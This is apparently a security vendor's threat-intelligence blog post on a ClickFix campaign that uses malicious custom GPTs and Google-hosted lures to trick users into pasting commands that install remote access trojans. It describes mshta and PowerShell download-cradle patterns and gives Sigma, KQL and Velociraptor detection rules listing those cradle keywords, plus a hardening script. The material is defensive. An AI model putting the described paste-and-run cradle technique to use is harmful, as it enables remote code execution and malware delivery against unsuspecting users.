Security researchers have uncovered an active ClickFix-style campaign in which threat actors abuse legitimate OpenAI and Google domains to deliver remote access trojans (RATs) to unsuspecting users. Instead of hosting malicious content on attacker-controlled infrastructure — which reputation filters and secure web gateways would flag in seconds — the adversaries are publishing malicious custom GPTs on chatgpt.com and leveraging Google's trusted properties to stage the lure content.
This is a meaningful escalation in the ClickFix trend we've tracked through 2025 and into 2026. ClickFix attacks work by convincing a victim to copy-paste a malicious command — typically presented as a "verification step," "CAPTCHA fix," or "reinstallation instruction" — into the Windows Run dialog, a terminal, or PowerShell. The victim executes the payload themselves, which bypasses most attachment-based and link-based email defenses. By hosting the lure on OpenAI and Google infrastructure, the attackers gain two decisive advantages: the domains pass every allowlist and reputation check, and the inherent user trust in these brands does the social engineering for them.
If your users can reach chatgpt.com or google.com from corporate endpoints — and they can — your perimeter is not stopping this. Detection has to move to the endpoint and the identity layer. This post breaks down the attack chain and provides production-ready detections and hardening guidance.
Technical Analysis: How the Attack Chain Works
The Lure
The campaign uses malicious custom GPTs — publicly shared GPT configurations hosted on OpenAI's legitimate chatgpt.com domain — alongside content staged on Google properties. These pages present the victim with what appears to be a legitimate workflow: a troubleshooting step, a verification prompt, or instructions to "fix" a supposed issue. The page instructs the user to:
- Press
Win + Rto open the Run dialog (or open PowerShell/Terminal). - Paste a command that the page has already placed on the clipboard via JavaScript, or that the user is told to copy.
- Press Enter.
The Payload Execution
The pasted command follows the now-standard ClickFix tradecraft. Observed patterns across this campaign family include:
mshta.exeinvoked with an inline URL to retrieve and execute an HTA or scriptlet payload, e.g.mshta https://<legitimate-looking-domain>/<path>.- PowerShell one-liners using
Invoke-Expression/IEXcombined withInvoke-WebRequestorNet.WebClient.DownloadStringto pull second-stage scripts directly into memory. - Commands padded with whitespace, junk characters, or
^escape characters to evade simple string matching, and frequently launched with hidden window styles (-w hidden,-WindowStyle Hidden).
The second stage typically delivers a commodity or semi-commodity RAT (families such as LummaC2-linked loaders, XWorm, AsyncRAT, and NetSupport have all been observed behind ClickFix chains), establishing persistence via Run keys or scheduled tasks and beaconing out to attacker C2 — sometimes itself fronted by legitimate cloud services.
Why This Defeats Traditional Controls
- Domain reputation is useless. The initial lure lives on chatgpt.com and google.com — domains no sane proxy policy blocks.
- No malicious attachment or macro. Email security has nothing to inspect; the "payload" is plain text the user voluntarily executes.
- Execution is user-initiated. EDRs see
explorer.exe(via the Run dialog) spawningpowershell.exeormshta.exe— a pattern that also occurs in legitimate IT workflows, which is why naive rules drown in false positives.
Exploitation Status
This is confirmed active in-the-wild exploitation of user trust, not a theoretical technique. No CVE is involved — there is no software vulnerability to patch. The "vulnerability" is the combination of trusted SaaS domains, clipboard manipulation, and the user's ability to execute arbitrary commands. Treat this with the same urgency as an actively exploited zero-day, because from a defense-in-depth standpoint the exposure is comparable.
Detection & Response
The highest-fidelity detection opportunities are at the process execution layer: a browser-visited page cannot be inspected post-facto, but explorer.exe spawning script interpreters with URLs in the command line is both rare in well-managed environments and highly characteristic of ClickFix. Focus your telemetry there.
Sigma Rules
---
title: ClickFix - Run Dialog Spawning Script Interpreter with URL
id: 3f8c1a72-6b4d-4e91-a2c7-9d0e5f6a7b8c
status: experimental
description: Detects Windows Run dialog (explorer.exe) spawning mshta, powershell, or similar interpreters with an HTTP(S) URL in the command line — the hallmark of ClickFix paste-and-run lures, including the malicious custom GPT campaign abusing OpenAI/Google domains.
references:
- https://www.darkreading.com/cyberattacks-data-breaches/malicious-custom-gpts-chatgpt-rat-delivery-lure
- https://attack.mitre.org/techniques/T1059/
- https://attack.mitre.org/techniques/T1204.002/
author: Security Arsenal
date: 2026/01/15
tags:
- attack.execution
- attack.t1059
- attack.t1204.002
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_interpreter:
Image|endswith:
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\rundll32.exe'
selection_url:
CommandLine|contains:
- 'http://'
- 'https://'
condition: all of selection_*
falsepositives:
- Rare legitimate admin workflows launching scripts by URL from the Run dialog — tune by known admin accounts/hosts
level: high
---
title: ClickFix - PowerShell Download Cradle with Hidden Window
id: 8a2e5d41-1c3f-4b68-9a0d-2e7c4f8b1a35
status: experimental
description: Detects PowerShell download cradles (IEX/DownloadString/Invoke-WebRequest) launched with hidden window flags, consistent with ClickFix second-stage payload retrieval and RAT delivery.
references:
- https://www.darkreading.com/cyberattacks-data-breaches/malicious-custom-gpts-chatgpt-rat-delivery-lure
- https://attack.mitre.org/techniques/T1059.001/
author: Security Arsenal
date: 2026/01/15
tags:
- attack.execution
- attack.t1059.001
- attack.command_and_control
- attack.t1071.001
logsource:
category: process_creation
product: windows
detection:
selection_cradle:
CommandLine|contains:
- 'DownloadString'
- 'DownloadFile'
- 'Invoke-WebRequest'
- 'Invoke-RestMethod'
- 'iwr '
- 'irm '
- 'curl.exe'
- 'Start-BitsTransfer'
selection_exec:
CommandLine|contains:
- 'IEX'
- 'Invoke-Expression'
- 'IEX('
- 'iex('
- '| iex'
- '-enc'
- '-e '
- 'FromBase64String'
selection_stealth:
CommandLine|contains:
- '-w hidden'
- '-WindowStyle Hidden'
- '-win hidden'
- '-nop'
condition: selection_cradle and (selection_exec or selection_stealth)
falsepositives:
- Software deployment tooling using scripted downloads — allowlist known management servers and deployment accounts
level: high
---
title: ClickFix - Script Interpreter Executing from User Temp or AppData
id: c47b9e03-5d2a-4f18-b6e3-8a1d0c4f7e92
status: experimental
description: Detects script interpreters or LOLBins executing payloads dropped into user-writable temp/AppData paths, a common staging location for ClickFix-delivered RATs.
references:
- https://www.darkreading.com/cyberattacks-data-breaches/malicious-custom-gpts-chatgpt-rat-delivery-lure
- https://attack.mitre.org/techniques/T1204.002/
author: Security Arsenal
date: 2026/01/15
tags:
- attack.execution
- attack.defense_evasion
- attack.t1204.002
logsource:
category: process_creation
product: windows
detection:
selection_path:
CommandLine|contains:
- '\AppData\Local\Temp\'
- '\AppData\Roaming\'
- '\Users\Public\'
- '%TEMP%'
- '%APPDATA%'
selection_exec:
Image|endswith:
- '\powershell.exe'
- '\mshta.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\rundll32.exe'
- '\regsvr32.exe'
filter_dropbox_updaters:
CommandLine|contains:
- '\AppData\Local\Microsoft\'
- 'WindowsUpdate'
condition: selection_path and selection_exec and not filter_dropbox_updaters
falsepositives:
- Some legitimate installers and updaters execute from AppData — maintain a tuned allowlist of signed updater command lines
level: medium
KQL — Microsoft Sentinel / Defender
Hunt across the last 14 days for the Run-dialog-to-interpreter pattern plus download cradles. The explorer.exe parent filter is your precision lever here.
let Lookback = 14d;
let Interpreters = dynamic(["mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"]);
DeviceProcessEvents
| where TimeGenerated >= ago(Lookback)
| where FileName in~ (Interpreters)
| where InitiatingProcessFileName =~ "explorer.exe"
| where ProcessCommandLine has_any ("http://", "https://")
or (ProcessCommandLine has_any ("DownloadString", "DownloadFile", "Invoke-WebRequest", "irm ", "iwr ", "IEX", "FromBase64String", "Start-BitsTransfer")
and ProcessCommandLine has_any ("-w hidden", "-WindowStyle Hidden", "-nop", "-enc", " -e "))
or ProcessCommandLine has_any ("\\AppData\\Local\\Temp\\", "\\Users\\Public\\", "%TEMP%", "%APPDATA%")
| extend SuspicionScore = case(
InitiatingProcessFileName =~ "explorer.exe" and ProcessCommandLine has "http", 3,
ProcessCommandLine has_all ("hidden", "IEX"), 2,
1)
| summarize Commands = make_set(ProcessCommandLine, 5), FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated)
by DeviceName, AccountName, FileName, SuspicionScore
| order by SuspicionScore desc, LastSeen desc
Also hunt the network side for endpoints reaching recently-registered or low-reputation infrastructure shortly after a suspicious process event — in Sentinel, join DeviceNetworkEvents to the process hunt above on DeviceName and a tight time window (datetime_diff('minute', ...) <= 5).
Velociraptor VQL
Use this artifact for fleet-wide hunting when you suspect a user clicked through the lure. It captures live process execution matching ClickFix tradecraft plus Run-key persistence commonly dropped by the delivered RATs.
-- Hunt for ClickFix-style execution: script interpreters with URL/cradle
-- command lines, and suspicious Run-key persistence in user hives.
LET procs = SELECT Pid, Ppid, Name, Exe, CommandLine, Username, CreateTime
FROM pslist()
WHERE CommandLine =~ '(?i)(mshta|powershell|pwsh|wscript|cscript|rundll32)'
AND (
CommandLine =~ '(?i)https?://'
OR CommandLine =~ '(?i)(DownloadString|Invoke-Expression|IEX|FromBase64String|-w(hidden)?\s+hidden|WindowStyle\s+Hidden)'
OR CommandLine =~ '(?i)(\\AppData\\Local\\Temp\\|\\Users\\Public\\|%TEMP%|%APPDATA%)'
)
LET runkeys = SELECT FullPath, Name,
Data.value AS Value
FROM glob(globs='HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run*\\*',
accessor='registry')
WHERE Value =~ '(?i)(powershell|mshta|wscript|rundll32|\\AppData\\|\\Temp\\|%APPDATA%|%TEMP%)'
SELECT * FROM procs
UNION ALL
SELECT NULL AS Pid, NULL AS Ppid, 'RUNKEY_PERSISTENCE' AS Name,
FullPath AS Exe, Value AS CommandLine, NULL AS Username, NULL AS CreateTime
FROM runkeys
Remediation / Hardening Script
There is no patch for social engineering, but you can shrink the attack surface and raise detection fidelity. The following PowerShell audit/hardening script: (1) enables PowerShell Script Block and Module logging, (2) enables process creation command-line auditing, (3) inventories RunMRU (Run dialog history) on the local machine to surface evidence of paste-and-run execution, and (4) optionally constrains mshta.exe outbound network access via Windows Firewall — one of the highest-value, lowest-breakage mitigations against ClickFix chains.
# ClickFix Hardening & Triage Script - Security Arsenal
# Run elevated. Review outputs before enforcing firewall rules in production.
# 1) Enable PowerShell Script Block Logging (surfaces decoded cradle content)
$sblPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $sblPath)) { New-Item -Path $sblPath -Force | Out-Null }
Set-ItemProperty -Path $sblPath -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
Write-Host '[+] PowerShell Script Block Logging enabled' -ForegroundColor Green
# 2) Enable command-line capture in process creation events (Event ID 4688)
$auditPath = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
if (-not (Test-Path $auditPath)) { New-Item -Path $auditPath -Force | Out-Null }
Set-ItemProperty -Path $auditPath -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1 -Type DWord
auditpol /set /subcategory:"Process Creation" /success:enable | Out-Null
Write-Host '[+] Process creation command-line auditing enabled' -ForegroundColor Green
# 3) Triage: dump RunMRU (Run dialog history) for all user profiles - look for pasted ClickFix commands
Write-Host '[*] Run dialog history (RunMRU) - review for mshta/powershell/URL entries:' -ForegroundColor Cyan
Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue |
Where-Object { $_.PSChildName -match '^S-1-5-21' } |
ForEach-Object {
$mru = "Registry::$_\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
if (Test-Path $mru) {
Get-ItemProperty $mru | Select-Object -Property * |
Out-String | Write-Host
}
}
# 4) Mitigation: block mshta.exe outbound (uncomment to enforce after testing)
# New-NetFirewallRule -DisplayName 'Block mshta.exe Outbound (ClickFix mitigation)' `
# -Direction Outbound -Program "$env:SystemRoot\System32\mshta.exe" -Action Block
# New-NetFirewallRule -DisplayName 'Block mshta.exe Outbound x86 (ClickFix mitigation)' `
# -Direction Outbound -Program "$env:SystemRoot\SysWOW64\mshta.exe" -Action Block
# 5) Check whether WDAC/AppLocker policy constrains script interpreters for standard users
$ci = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue
if ($ci -and $ci.CodeIntegrityPolicyEnforcementStatus -eq 0) {
Write-Host '[!] WDAC not enforced - consider an AppLocker/WDAC policy restricting mshta, wscript, cscript for standard users' -ForegroundColor Yellow
}
Write-Host '[*] Complete. Forward Script Block logs (Event ID 4104) and 4688 events to your SIEM.' -ForegroundColor Green
Remediation and Defensive Recommendations
Immediate actions (this week):
- Deploy the endpoint detections above. The
explorer.exe → interpreter + URLpattern is your highest-fidelity signal. Validate against your environment, then promote to alerting. - Enable PowerShell Script Block Logging and command-line process auditing fleet-wide if not already done. ClickFix payloads are frequently Base64-encoded; Script Block Logging captures the decoded content — often the only place you'll see the real payload.
- Block or alert on
mshta.exemaking network connections. Legitimate use of mshta fetching remote HTA content is near-zero in modern enterprises. A firewall or EDR network rule here breaks a large percentage of ClickFix chains outright. - User awareness, specifically on ClickFix. Generic phishing training does not cover this. Users must know: no legitimate site — including ChatGPT or Google — will ever ask you to paste a command into the Run dialog or PowerShell. Make that sentence part of onboarding.
Strategic hardening:
- Constrain script interpreters for standard users via WDAC or AppLocker. If a user's role doesn't require PowerShell,
mshta,wscript, orcscript, remove or restrict them. This converts a successful social-engineering event into a blocked execution event. - Treat AI-platform traffic as a monitored category. You cannot block chatgpt.com, but you can log and alert on sessions to shared/public GPT URLs, flag clipboard-heavy web behavior via browser isolation for high-risk users, and route AI SaaS traffic through a CASB with session controls.
- Establish an AI usage policy that distinguishes sanctioned, logged corporate AI access from arbitrary public GPT interaction — and enforce it technically where possible.
- Hunt RunMRU and recent process telemetry retrospectively. If this campaign touched your environment in the last 30 days, Run dialog history and 4688/4104 logs will tell you. Look for interpreters with URLs, followed by persistence creation (Run keys, scheduled tasks) within minutes.
The uncomfortable lesson of this campaign is that the attackers didn't break anything — they used OpenAI's and Google's platforms exactly as designed, and the victim's own hands did the rest. Patch management won't save you here; execution control, logging depth, and user education will.
Related Resources
Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.